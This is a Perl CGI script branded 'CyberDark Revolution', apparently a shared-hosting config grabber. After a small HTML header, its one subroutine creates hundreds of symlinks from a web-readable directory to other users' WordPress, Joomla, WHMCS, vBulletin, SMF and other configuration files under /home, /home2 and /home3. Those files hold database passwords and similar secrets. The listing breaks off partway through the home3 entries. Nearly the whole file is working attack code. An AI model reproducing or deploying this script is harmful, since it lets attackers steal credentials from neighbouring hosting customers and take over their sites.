#!/usr/bin/perl -I/usr/local/bandmin
print "Content-type: text/html\n\n";
print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>CyberDark Revolution</title>
<link rel="shortcut icon" href="http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/63.gif"/>
<style type="text/css">
body {
<09>background-color: #000000;

}
.newStyle1 {
 font-family: Tahoma;
 font-size: x-small;
 font-weight: bold;
 color: #59E817;
  text-align: center;
}
</style>
</head>
';
sub lil{
    ($user) = @_;
$msr = qx{pwd};
$kola=$msr."/".$user;
$kola=~s/\n//g;
symlink('/home/'.$user.'/public_html/beta/configuration.php',$kola.' ~~ beta - Joomla.txt') ; 
symlink('/home/'.$user.'/public_html/configuration.php',$kola.' ~~ joomla.txt') ; 
symlink('/home/'.$user.'/public_html/includes/config.php',$kola.' ~~ vBulletin-2.txt') ; 
symlink('/home/'.$user.'/public_html/home/configuration.php',$kola.' ~~ home - Joomla.txt') ;
symlink('/home/'.$user.'/public_html/store/configuration.php',$kola.' ~~ store - Joomla.txt') ;
symlink('/home/'.$user.'/public_html/joomla/configuration.php',$kola.' ~~ joomla - Joomla.txt');
symlink('/home/'.$user.'/public_html/portal/configuration.php',$kola.' ~~ portal - Joomla.txt');
symlink('/home/'.$user.'/public_html/joom/configuration.php',$kola.' ~~ joom - Joomla.txt');
symlink('/home/'.$user.'/public_html/joo/configuration.php',$kola.' ~~ jom - Joomla.txt');
symlink('/home/'.$user.'/public_html/cms/configuration.php',$kola.' ~~ cms - Joomla.txt');
symlink('/home/'.$user.'/public_html/site/configuration.php',$kola.' ~~ site - Joomla.txt');
symlink('/home/'.$user.'/public_html/main/configuration.php',$kola.' ~~ main - Joomla.txt');
symlink('/home/'.$user.'/public_html/news/configuration.php',$kola.' ~~ news - Joomla.txt');
symlink('/home/'.$user.'/public_html/new/configuration.php',$kola.' ~~ new - Joomla.txt');
symlink('/home/'.$user.'/public_html/home/configuration.php',$kola.' ~~ home - Joomla.txt');
symlink('/home/'.$user.'/public_html/test/configuration.php',$kola.' ~~ test - Joomla.txt');
symlink('/home/'.$user.'/public_html/myshop/configuration.php',$kola.' ~~ myshop - Joomla.txt'); 
symlink('/home/'.$user.'/public_html/Settings.php',$kola.' ~~ Smf.txt'); 
symlink('/home/'.$user.'/public_html/smf/Settings.php',$kola.' ~~ smf - Smf.txt'); 
symlink('/home/'.$user.'/public_html/forum/Settings.php',$kola.' ~~ forum - Smf.txt'); 
symlink('/home/'.$user.'/public_html/forums/Settings.php',$kola.' ~~ forums - Smf.txt'); 
symlink('/home/'.$user.'/public_html/sites/default/settings.php',$kola.' ~~ sites - default - configuration 3.txt');
symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$kola.' ~~ Zencart.txt'); 
symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$kola.' ~~ zencart - zencart.txt'); 
symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$kola.' ~~ shop - zencart.txt'); 
symlink('/home/'.$user.'/public_html/includes/configure.php',$kola.' ~~ Oscommerce.txt');
symlink('/home/'.$user.'/public_html/oscommerce/includes/configure.php',$kola.' ~~ oscommerce - Oscommerce.txt');
symlink('/home/'.$user.'/public_html/oscommerces/includes/configure.php',$kola.' ~~ oscommerces -Oscommerces.txt');
symlink('/home/'.$user.'/public_html/shopping/includes/configure.php',$kola.' ~~ shopping - Shopping.txt');
symlink('/home/'.$user.'/public_html/sale/includes/configure.php',$kola.' ~~ sale - Oscommerce.txt');
symlink('/home/'.$user.'/public_html/store/includes/configure.php',$kola.' ~~ store - Oscommerce.txt');
symlink('/home/'.$user.'/public_html/inc/config.php',$kola.' ~~ MyBB.txt') ;
symlink('/home/'.$user.'/public_html/forum/inc/config.php',$kola.' ~~ forum - MyBB .txt') ;
symlink('/home/'.$user.'/public_html/lib/config.php',$kola.' ~~ Balitbang.txt') ; 
symlink('/home/'.$user.'/public_html/cc/includes/config.php',$kola.' ~~ VBulletin4.txt');
symlink('/home/'.$user.'/public_html/forum/includes/config.php',$kola.' ~~ forum - vBulletin.txt');
symlink('/home/'.$user.'/public_html/forum/config.php',$kola.' ~~ forum - PhpBB.txt') ;
symlink('/home/'.$user.'/public_html/amember/config.inc.php',$kola.' ~~ Amember.txt');
symlink('/home/'.$user.'/public_html/config.inc.php',$kola.' ~~ Amember2.txt');
symlink('/home/'.$user.'/public_html/vb/includes/config.php',$kola.' ~~ Vb.txt');
symlink('/home/'.$user.'/public_html/vb3/includes/config.php',$kola.' ~~ Vb3.txt');
symlink('/home/'.$user.'/public_html/upload/includes/config.php',$kola.' ~~ Upload.txt');
symlink('/home/'.$user.'/public_html/incl/config.php',$kola.' ~~ Malay.txt');
symlink('/home/'.$user.'/public_html/config/koneksi.php',$kola.' ~~ Lokomedia.txt');
symlink('/home/'.$user.'/public_html/config/config.php',$kola.' ~~ config.txt');
symlink('/home/'.$user.'/public_html/datas/config.php',$kola.' ~~ datas - configuration 3.txt');
symlink('/home/'.$user.'/public_html/forum/conf/config.php',$kola.' ~~ forum - Other-1.txt') ; 
symlink('/home/'.$user.'/public_html/include/config.php',$kola.' ~~ Other-2.txt');
symlink('/home/'.$user.'/public_html/config.php',$kola.' ~~ Other-3.txt') ;
symlink('/home/'.$user.'/public_html/admin/conf.php',$kola.' ~~ admin - Other-4.txt');
symlink('/home/'.$user.'/public_html/connect.php',$kola.' ~~ Other-5.txt');
symlink('/home/'.$user.'/public_html/codelibrary/inc/variables.php',$kola.' ~~ Other-6.txt') ;
symlink('/home/'.$user.'/public_html/client/configuration.php',$kola.' ~~ client - admin Whm1.txt') ; 
symlink('/home/'.$user.'/public_html/clients/configuration.php',$kola.' ~~ clients - Whm2.txt') ; 
symlink('/home/'.$user.'/public_html/billing/configuration.php',$kola.' ~~ billing - Whm3.txt') ; 
symlink('/home/'.$user.'/public_html/billings/configuration.php',$kola.' ~~ Whm4.txt') ;
symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$kola.' ~~ whmcs - Whm5.txt') ; 
symlink('/home/'.$user.'/public_html/whm/configuration.php',$kola.' ~~ whm - Whm6.txt');
symlink('/home/'.$user.'/public_html/order/configuration.php',$kola.' ~~ order - Whm7.txt');
symlink('/home/'.$user.'/public_html/whmc/configuration.php',$kola.' ~~ whmc - Whm8.txt');
symlink('/home/'.$user.'/public_html/submitticket.php',$kola.' ~~ whm9.txt');
symlink('/home/'.$user.'/public_html/manage/configuration.php',$kola.' ~~ manage -Whm10.txt'); 
symlink('/home/'.$user.'/public_html/clientes/configuration.php',$kola.' ~~ clientes - Whm11.txt');
symlink('/home/'.$user.'/public_html/cliente/configuration.php',$kola.' ~~ cliente - Whm12txt');
symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$kola.' ~~ clientsupport - Whm13.txt');
symlink('/home/'.$user.'/public_html/support/configuration.php',$kola.' ~~ support - Whm13.txt');
symlink('/home/'.$user.'/public_html/supports/configuration.php',$kola.' ~~ supports - Whm14.txt');
symlink('/home/'.$user.'/public_html/cpanel/configuration.php',$kola.' ~~ cpanel - Whm15');
symlink('/home/'.$user.'/public_html/panel/configuration.php',$kola.' ~~ panel - Whm16');
symlink('/home/'.$user.'/public_html/host/configuration.php',$kola.' ~~ host - Whm17');
symlink('/home/'.$user.'/public_html/hosting/configuration.php',$kola.' ~~ hosting - Whm18');
symlink('/home/'.$user.'/public_html/hosts/configuration.php',$kola.' ~~ hosts - Whm19');
symlink('/home/'.$user.'/public_html/v1/configuration.php',$kola.' ~~ v1 - Whm20');
symlink('/home/'.$user.'/public_html/v2/configuration.php',$kola.' ~~ v2 - Whm21');
symlink('/home/'.$user.'/public_html/baru/configuration.php',$kola.' ~~ v2 - Whm22');
symlink('/home/'.$user.'/public_html/wp-config.php',$kola.' ~~ Wordpress.txt') ; 
symlink('/home/'.$user.'/public_html/blog/wp-config.php',$kola.' ~~ Wordpress.txt') ; 
symlink('/home/'.$user.'/public_html/Connections/cms_blog.php',$kola.' ~~ admin - cms_blog.txt') ; 
symlink('/home/'.$user.'/public_html/web/wp-config.php',$kola.' ~~ web - Wordpress .txt') ; 
symlink('/home/'.$user.'/public_html/welcome/wp-config.php',$kola.' ~~ welcome - Wordpress .txt') ; 
symlink('/home/'.$user.'/public_html/store/wp-config.php',$kola.' ~~ store - Wordpress .txt') ; 
symlink('/home/'.$user.'/public_html/wp/wp-config.php',$kola.' ~~ wp - Wordpress.txt');
symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$kola.' ~~ wp - beta - Wordpress.txt');
symlink('/home/'.$user.'/public_html/beta/wp-config.php',$kola.' ~~ beta - Wordpress.txt');
symlink('/home/'.$user.'/public_html/press/wp-config.php',$kola.' ~~ press - Wp13.txt');
symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$kola.' ~~ wordpress - Wordpress.txt');
symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$kola.' ~~ wordpress - beta - Wordpress.txt');
symlink('/home/'.$user.'/public_html/news/wp-config.php',$kola.' ~~ news - Wordpress.txt');
symlink('/home/'.$user.'/public_html/new/wp-config.php',$kola.' ~~ new - Wordpress.txt');
symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$kola.' ~~ blog - Wordpress.txt');
symlink('/home/'.$user.'/public_html/home/wp-config.php',$kola.' ~~ home - Wordpress.txt');
symlink('/home/'.$user.'/public_html/portal/wp-config.php',$kola.' ~~ portal - Wordpres.txt');
symlink('/home/'.$user.'/public_html/site/wp-config.php',$kola.' ~~ site - Wordpress.txt');
symlink('/home/'.$user.'/public_html/main/wp-config.php',$kola.' ~~ main - Wordpress.txt');
symlink('/home/'.$user.'/public_html/test/wp-config.php',$kola.' ~~ test - Wordpress.txt');
symlink('/home/'.$user.'/public_html/SSI.php',$kola.' ~~ C M F .txt') ; 
symlink('/home/'.$user.'/public_html/forum/SSI.php',$kola.' ~~ forum - C M F .txt') ; 
symlink('/home/'.$user.'/public_html/system/sistem.php',$kola.' ~~ Lokomedia.txt'); 
symlink('/home/'.$user.'/public_html/mk_conf.php',$kola.' ~~ mk-portale1.txt');
symlink('/home/'.$user.'/public_html/includes/functions.php',$kola.' ~~ hpbb3.txt');
symlink('/home/'.$user.'/public_html/include/db.php',$kola.' ~~ infinity.txt');
symlink('/home/'.$user.'/public_html/conf_global.php',$kola.' ~~ invisio.txt');
symlink('/home/'.$user.'/public_html/admin/config.php',$kola.' ~~ admin - OpenCart-4.txt') ;
symlink('/home2/'.$user.'/public_html/beta/configuration.php',$kola.' ~~ beta - Joomla.txt') ; 
symlink('/home2/'.$user.'/public_html/configuration.php',$kola.' ~~ joomla.txt') ; 
symlink('/home2/'.$user.'/public_html/includes/config.php',$kola.' ~~ vBulletin-2.txt') ; 
symlink('/home2/'.$user.'/public_html/home/configuration.php',$kola.' ~~ home - Joomla.txt') ;
symlink('/home2/'.$user.'/public_html/store/configuration.php',$kola.' ~~ store - Joomla.txt') ;
symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$kola.' ~~ joomla - Joomla.txt');
symlink('/home2/'.$user.'/public_html/portal/configuration.php',$kola.' ~~ portal - Joomla.txt');
symlink('/home2/'.$user.'/public_html/joom/configuration.php',$kola.' ~~ joom - Joomla.txt');
symlink('/home2/'.$user.'/public_html/joo/configuration.php',$kola.' ~~ jom - Joomla.txt');
symlink('/home2/'.$user.'/public_html/cms/configuration.php',$kola.' ~~ cms - Joomla.txt');
symlink('/home2/'.$user.'/public_html/site/configuration.php',$kola.' ~~ site - Joomla.txt');
symlink('/home2/'.$user.'/public_html/main/configuration.php',$kola.' ~~ main - Joomla.txt');
symlink('/home2/'.$user.'/public_html/news/configuration.php',$kola.' ~~ news - Joomla.txt');
symlink('/home2/'.$user.'/public_html/new/configuration.php',$kola.' ~~ new - Joomla.txt');
symlink('/home2/'.$user.'/public_html/home/configuration.php',$kola.' ~~ home - Joomla.txt');
symlink('/home2/'.$user.'/public_html/test/configuration.php',$kola.' ~~ test - Joomla.txt');
symlink('/home2/'.$user.'/public_html/myshop/configuration.php',$kola.' ~~ myshop - Joomla.txt'); 
symlink('/home2/'.$user.'/public_html/Settings.php',$kola.' ~~ Smf.txt'); 
symlink('/home2/'.$user.'/public_html/smf/Settings.php',$kola.' ~~ smf - Smf.txt'); 
symlink('/home2/'.$user.'/public_html/forum/Settings.php',$kola.' ~~ forum - Smf.txt'); 
symlink('/home2/'.$user.'/public_html/forums/Settings.php',$kola.' ~~ forums - Smf.txt'); 
symlink('/home2/'.$user.'/public_html/sites/default/settings.php',$kola.' ~~ sites - default - configuration 3.txt');
symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$kola.' ~~ Zencart.txt'); 
symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$kola.' ~~ zencart - zencart.txt'); 
symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$kola.' ~~ shop - zencart.txt'); 
symlink('/home2/'.$user.'/public_html/includes/configure.php',$kola.' ~~ Oscommerce.txt');
symlink('/home2/'.$user.'/public_html/oscommerce/includes/configure.php',$kola.' ~~ oscommerce - Oscommerce.txt');
symlink('/home2/'.$user.'/public_html/oscommerces/includes/configure.php',$kola.' ~~ oscommerces -Oscommerces.txt');
symlink('/home2/'.$user.'/public_html/shopping/includes/configure.php',$kola.' ~~ shopping - Shopping.txt');
symlink('/home2/'.$user.'/public_html/sale/includes/configure.php',$kola.' ~~ sale - Oscommerce.txt');
symlink('/home2/'.$user.'/public_html/store/includes/configure.php',$kola.' ~~ store - Oscommerce.txt');
symlink('/home2/'.$user.'/public_html/inc/config.php',$kola.' ~~ MyBB.txt') ;
symlink('/home2/'.$user.'/public_html/forum/inc/config.php',$kola.' ~~ forum - MyBB .txt') ;
symlink('/home2/'.$user.'/public_html/lib/config.php',$kola.' ~~ Balitbang.txt') ; 
symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$kola.' ~~ VBulletin4.txt');
symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$kola.' ~~ forum - vBulletin.txt');
symlink('/home2/'.$user.'/public_html/forum/config.php',$kola.' ~~ forum - PhpBB.txt') ;
symlink('/home2/'.$user.'/public_html/amember/config.inc.php',$kola.' ~~ Amember.txt');
symlink('/home2/'.$user.'/public_html/config.inc.php',$kola.' ~~ Amember2.txt');
symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$kola.' ~~ Vb.txt');
symlink('/home2/'.$user.'/public_html/vb3/includes/config.php',$kola.' ~~ Vb3.txt');
symlink('/home2/'.$user.'/public_html/upload/includes/config.php',$kola.' ~~ Upload.txt');
symlink('/home2/'.$user.'/public_html/incl/config.php',$kola.' ~~ Malay.txt');
symlink('/home2/'.$user.'/public_html/config/koneksi.php',$kola.' ~~ Lokomedia.txt');
symlink('/home2/'.$user.'/public_html/config/config.php',$kola.' ~~ config.txt');
symlink('/home2/'.$user.'/public_html/datas/config.php',$kola.' ~~ datas - configuration 3.txt');
symlink('/home2/'.$user.'/public_html/forum/conf/config.php',$kola.' ~~ forum - Other-1.txt') ; 
symlink('/home2/'.$user.'/public_html/include/config.php',$kola.' ~~ Other-2.txt');
symlink('/home2/'.$user.'/public_html/config.php',$kola.' ~~ Other-3.txt') ;
symlink('/home2/'.$user.'/public_html/admin/conf.php',$kola.' ~~ admin - Other-4.txt');
symlink('/home2/'.$user.'/public_html/connect.php',$kola.' ~~ Other-5.txt');
symlink('/home2/'.$user.'/public_html/codelibrary/inc/variables.php',$kola.' ~~ Other-6.txt') ;
symlink('/home2/'.$user.'/public_html/client/configuration.php',$kola.' ~~ client - admin Whm1.txt') ; 
symlink('/home2/'.$user.'/public_html/clients/configuration.php',$kola.' ~~ clients - Whm2.txt') ; 
symlink('/home2/'.$user.'/public_html/billing/configuration.php',$kola.' ~~ billing - Whm3.txt') ; 
symlink('/home2/'.$user.'/public_html/billings/configuration.php',$kola.' ~~ Whm4.txt') ;
symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$kola.' ~~ whmcs - Whm5.txt') ; 
symlink('/home2/'.$user.'/public_html/whm/configuration.php',$kola.' ~~ whm - Whm6.txt');
symlink('/home2/'.$user.'/public_html/order/configuration.php',$kola.' ~~ order - Whm7.txt');
symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$kola.' ~~ whmc - Whm8.txt');
symlink('/home2/'.$user.'/public_html/submitticket.php',$kola.' ~~ whm9.txt');
symlink('/home2/'.$user.'/public_html/manage/configuration.php',$kola.' ~~ manage -Whm10.txt'); 
symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$kola.' ~~ clientes - Whm11.txt');
symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$kola.' ~~ cliente - Whm12txt');
symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$kola.' ~~ clientsupport - Whm13.txt');
symlink('/home2/'.$user.'/public_html/support/configuration.php',$kola.' ~~ support - Whm13.txt');
symlink('/home2/'.$user.'/public_html/supports/configuration.php',$kola.' ~~ supports - Whm14.txt');
symlink('/home2/'.$user.'/public_html/cpanel/configuration.php',$kola.' ~~ cpanel - Whm15');
symlink('/home2/'.$user.'/public_html/panel/configuration.php',$kola.' ~~ panel - Whm16');
symlink('/home2/'.$user.'/public_html/host/configuration.php',$kola.' ~~ host - Whm17');
symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$kola.' ~~ hosting - Whm18');
symlink('/home2/'.$user.'/public_html/hosts/configuration.php',$kola.' ~~ hosts - Whm19');
symlink('/home2/'.$user.'/public_html/v1/configuration.php',$kola.' ~~ v1 - Whm20');
symlink('/home2/'.$user.'/public_html/v2/configuration.php',$kola.' ~~ v2 - Whm21');
symlink('/home2/'.$user.'/public_html/baru/configuration.php',$kola.' ~~ v2 - Whm22');
symlink('/home2/'.$user.'/public_html/wp-config.php',$kola.' ~~ Wordpress.txt') ; 
symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$kola.' ~~ Wordpress.txt') ; 
symlink('/home2/'.$user.'/public_html/Connections/cms_blog.php',$kola.' ~~ admin - cms_blog.txt') ; 
symlink('/home2/'.$user.'/public_html/web/wp-config.php',$kola.' ~~ web - Wordpress .txt') ; 
symlink('/home2/'.$user.'/public_html/welcome/wp-config.php',$kola.' ~~ welcome - Wordpress .txt') ; 
symlink('/home2/'.$user.'/public_html/store/wp-config.php',$kola.' ~~ store - Wordpress .txt') ; 
symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$kola.' ~~ wp - Wordpress.txt');
symlink('/home2/'.$user.'/public_html/wp/beta/wp-config.php',$kola.' ~~ wp - beta - Wordpress.txt');
symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$kola.' ~~ beta - Wordpress.txt');
symlink('/home2/'.$user.'/public_html/press/wp-config.php',$kola.' ~~ press - Wp13.txt');
symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$kola.' ~~ wordpress - Wordpress.txt');
symlink('/home2/'.$user.'/public_html/wordpress/beta/wp-config.php',$kola.' ~~ wordpress - beta - Wordpress.txt');
symlink('/home2/'.$user.'/public_html/news/wp-config.php',$kola.' ~~ news - Wordpress.txt');
symlink('/home2/'.$user.'/public_html/new/wp-config.php',$kola.' ~~ new - Wordpress.txt');
symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$kola.' ~~ blog - Wordpress.txt');
symlink('/home2/'.$user.'/public_html/home/wp-config.php',$kola.' ~~ home - Wordpress.txt');
symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$kola.' ~~ portal - Wordpres.txt');
symlink('/home2/'.$user.'/public_html/site/wp-config.php',$kola.' ~~ site - Wordpress.txt');
symlink('/home2/'.$user.'/public_html/main/wp-config.php',$kola.' ~~ main - Wordpress.txt');
symlink('/home2/'.$user.'/public_html/test/wp-config.php',$kola.' ~~ test - Wordpress.txt');
symlink('/home2/'.$user.'/public_html/SSI.php',$kola.' ~~ C M F .txt') ; 
symlink('/home2/'.$user.'/public_html/forum/SSI.php',$kola.' ~~ forum - C M F .txt') ; 
symlink('/home2/'.$user.'/public_html/system/sistem.php',$kola.' ~~ Lokomedia.txt'); 
symlink('/home2/'.$user.'/public_html/mk_conf.php',$kola.' ~~ mk-portale1.txt');
symlink('/home2/'.$user.'/public_html/includes/functions.php',$kola.' ~~ hpbb3.txt');
symlink('/home2/'.$user.'/public_html/include/db.php',$kola.' ~~ infinity.txt');
symlink('/home2/'.$user.'/public_html/conf_global.php',$kola.' ~~ invisio.txt');
symlink('/home2/'.$user.'/public_html/admin/config.php',$kola.' ~~ admin - OpenCart-4.txt') ;
symlink('/home3/'.$user.'/public_html/beta/configuration.php',$kola.' ~~ beta - Joomla.txt') ; 
symlink('/home3/'.$user.'/public_html/configuration.php',$kola.' ~~ joomla.txt') ; 
symlink('/home3/'.$user.'/public_html/includes/config.php',$kola.' ~~ vBulletin-2.txt') ; 
symlink('/home3/'.$user.'/public_html/home/configuration.php',$kola.' ~~ home - Joomla.txt') ;
symlink('/home3/'.$user.'/public_html/store/configuration.php',$kola.' ~~ store - Joomla.txt') ;
symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$kola.' ~~ joomla - Joomla.txt');
symlink('/home3/'.$user.'/public_html/portal/configuration.php',$kola.' ~~ portal - Joomla.txt');
symlink('/home3/'.$user.'/public_html/joom/configuration.php',$kola.' ~~ joom - Joomla.txt');
symlink('/home3/'.$user.'/public_html/joo/configuration.php',$kola.' ~~ jom - Joomla.txt');
symlink('/home3/'.$user.'/public_html/cms/configuration.php',$kola.' ~~ cms - Joomla.txt');
symlink('/home3/'.$user.'/public_html/site/configuration.php',$kola.' ~~ site - Joomla.txt');
symlink('/home3/'.$user.'/public_html/main/configuration.php',$kola.' ~~ main - Joomla.txt');
symlink('/home3/'.$user.'/public_html/news/configuration.php',$kola.' ~~ news - Joomla.txt');
symlink('/home3/'.$user.'/public_html/new/configuration.php',$kola.' ~~ new - Joomla.txt');
symlink('/home3/'.$user.'/public_html/home/configuration.php',$kola.' ~~ home - Joomla.txt');
symlink('/home3/'.$user.'/public_html/test/configuration.php',$kola.' ~~ test - Joomla.txt');
symlink('/home3/'.$user.'/public_html/myshop/configuration.php',$kola.' ~~ myshop - Joomla.txt'); 
symlink('/home3/'.$user.'/public_html/Settings.php',$kola.' ~~ Smf.txt'); 
symlink('/home3/'.$user.'/public_html/smf/Settings.php',$kola.' ~~ smf - Smf.txt'); 
symlink('/home3/'.$user.'/public_html/forum/Settings.php',$kola.' ~~ forum - Smf.txt'); 
symlink('/home3/'.$user.'/public_html/forums/Settings.php',$kola.' ~~ forums - Smf.txt'); 
symlink('/home3/'.$user.'/public_html/sites/default/settings.php',$kola.' ~~ sites - default - configuration 3.txt');
symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$kola.' ~~ Zencart.txt'); 
symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$kola.' ~~ zencart - zencart.txt'); 
symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$kola.' ~~ shop - zencart.txt'); 
symlink('/home3/'.$user.'/public_html/includes/configure.php',$kola.' ~~ Oscommerce.txt');
symlink('/home3/'.$user.'/public_html/oscommerce/includes/configure.php',$kola.' ~~ oscommerce - Oscommerce.txt');
symlink('/home3/'.$user.'/public_html/oscommerces/includes/configure.php',$kola.' ~~ oscommerces -Oscommerces.txt');
symlink('/home3/'.$user.'/public_html/shopping/includes/configure.php',$kola.' ~~ shopping - Shopping.txt');
symlink('/home3/'.$user.'/public_html/sale/includes/configure.php',$kola.' ~~ sale - Oscommerce.txt');
symlink('/home3/'.$user.'/public_html/store/includes/configure.php',$kola.' ~~ store - Oscommerce.txt');
symlink('/home3/'.$user.'/public_html/inc/config.php',$kola.' ~~ MyBB.txt') ;
symlink('/home3/'.$user.'/public_html/forum/inc/config.php',$kola.' ~~ forum - MyBB .txt') ;
symlink('/home3/'.$user.'/public_html/lib/config.php',$kola.' ~~ Balitbang.txt') ; 
symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$kola.' ~~ VBulletin4.txt');
symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$kola.' ~~ forum - vBulletin.txt');
symlink('/home3/'.$user.'/public_html/forum/config.php',$kola.' ~~ forum - PhpBB.txt') ;
symlink('/home3/'.$user.'/public_html/amember/config.inc.php',$kola.' ~~ Amember.txt');
symlink('/home3/'.$user.'/public_html/config.inc.php',$kola.' ~~ Amember2.txt');
symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$kola.' ~~ Vb.txt');
symlink('/home3/'.$user.'/public_html/vb3/includes/config.php',$kola.' ~~ Vb3.txt');
symlink('/home3/'.$user.'/public_html/upload/includes/config.php',$kola.' ~~ Upload.txt');
symlink('/home3/'.$user.'/public_html/incl/config.php',$kola.' ~~ Malay.txt');
symlink('/home3/'.$user.'/public_html/config/koneksi.php',$kola.' ~~ Lokomedia.txt');
symlink('/home3/'.$user.'/public_html/config/config.php',$kola.' ~~ config.txt');
symlink('/home3/'.$user.'/public_html/datas/config.php',$kola.' ~~ datas - configuration 3.txt');
symlink('/home3/'.$user.'/public_html/forum/conf/config.php',$kola.' ~~ forum - Other-1.txt') ; 
symlink('/home3/'.$user.'/public_html/include/config.php',$kola.' ~~ Other-2.txt');
symlink('/home3/'.$user.'/public_html/config.php',$kola.' ~~ Other-3.txt') ;
symlink('/home3/'.$user.'/public_html/admin/conf.php',$kola.' ~~ admin - Other-4.txt');
symlink('/home3/'.$user.'/public_html/connect.php',$kola.' ~~ Other-5.txt');
symlink('/home3/'.$user.'/public_html/codelibrary/inc/variables.php',$kola.' ~~ Other-6.txt') ;
symlink('/home3/'.$user.'/public_html/client/configuration.php',$kola.' ~~ client - admin Whm1.txt') ; 
symlink('/home3/'.$user.'/public_html/clients/configuration.php',$kola.' ~~ clients - Whm2.txt') ; 
symlink('/home3/'.$user.'/public_html/billing/configuration.php',$kola.' ~~ billing - Whm3.txt') ; 
symlink('/home3/'.$user.'/public_html/billings/configuration.php',$kola.' ~~ Whm4.txt') ;
symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$kola.' ~~ whmcs - Whm5.txt') ; 
symlink('/home3/'.$user.'/public_html/whm/configuration.php',$kola.' ~~ whm - Whm6.txt');
symlink('/home3/'.$user.'/public_html/order/configuration.php',$kola.' ~~ order - Whm7.txt');
symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$kola.' ~~ whmc - Whm8.txt');
symlink('/home3/'.$user.'/public_html/submitticket.php',$kola.' ~~ whm9.txt');
symlink('/home3/'.$user.'/public_html/manage/configuration.php',$kola.' ~~ manage -Whm10.txt'); 
symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$kola.' ~~ clientes - Whm11.txt');
symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$kola.' ~~ cliente - Whm12txt');
symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$kola.' ~~ clientsupport - Whm13.txt');
symlink('/home3/'.$user.'/public_html/support/configuration.php',$kola.' ~~ support - Whm13.txt');
symlink('/home3/'.$user.'/public_html/supports/configuration.php',$kola.' ~~ supports - Whm14.txt');
symlink('/home3/'.$user.'/public_html/cpanel/configuration.php',$kola.' ~~ cpanel - Whm15');
symlink('/home3/'.$user.'/public_html/panel/configuration.php',$kola.' ~~ panel - Whm16');
symlink('/home3/'.$user.'/public_html/host/configuration.php',$kola.' ~~ host - Whm17');
symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$kola.' ~~ hosting - Whm18');
symlink('/home3/'.$user.'/public_html/hosts/configuration.php',$kola.' ~~ hosts - Whm19');
symlink('/home3/'.$user.'/public_html/v1/configuration.php',$kola.' ~~ v1 - Whm20');
symlink('/home3/'.$user.'/public_html/v2/configuration.php',$kola.' ~~ v2 - Whm21');
symlink('/home3/'.$user.'/public_html/baru/configuration.php',$kola.' ~~ v2 - Whm22');
symlink('/home3/'.$user.'/public_html/wp-config.php',$kola.' ~~ Wordpress.txt') ; 
symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$kola.' ~~ Wordpress.txt') ; 
symlink('/home3/'.$user.'/public_html/Connections/cms_blog.php',$kola.' ~~ admin - cms_blog.txt') ; 
symlink('/home3/'.$user.'/public_html/web/wp-config.php',$kola.' ~~ web - Wordpress .txt') ; 
symlink('/home3/'.$user.'/public_html/welcome/wp-config.php',$kola.' ~~ welcome - Wordpress .txt') ; 
symlink('/home3/'.$user.'/public_html/store/wp-config.php',$kola.' ~~ store - Wordpress .txt') ; 
symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$kola.' ~~ wp - Wordpress.txt');
symlink('/home3/'.$user.'/public_html/wp/beta/wp-config.php',$kola.' ~~ wp - beta - Wordpress.txt');
symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$kola.' ~~ beta - Wordpress.txt');
symlink('/home3/'.$user.'/public_html/press/wp-config.php',$kola.' ~~ press - Wp13.txt');
symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$kola.' ~~ wordpress - Wordpress.txt');
symlink('/home3/'.$user.'/public_html/wordpress/beta/wp-config.php',$kola.' ~~ wordpress - beta - Wordpress.txt');
symlink('/home3/'.$user.'/public_html/news/wp-config.php',$kola.' ~~ news - Wordpress.txt');
symlink('/home3/'.$user.'/public_html/new/wp-config.php',$kola.' ~~ new - Wordpress.txt');
symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$kola.' ~~ blog - Wordpress.txt');
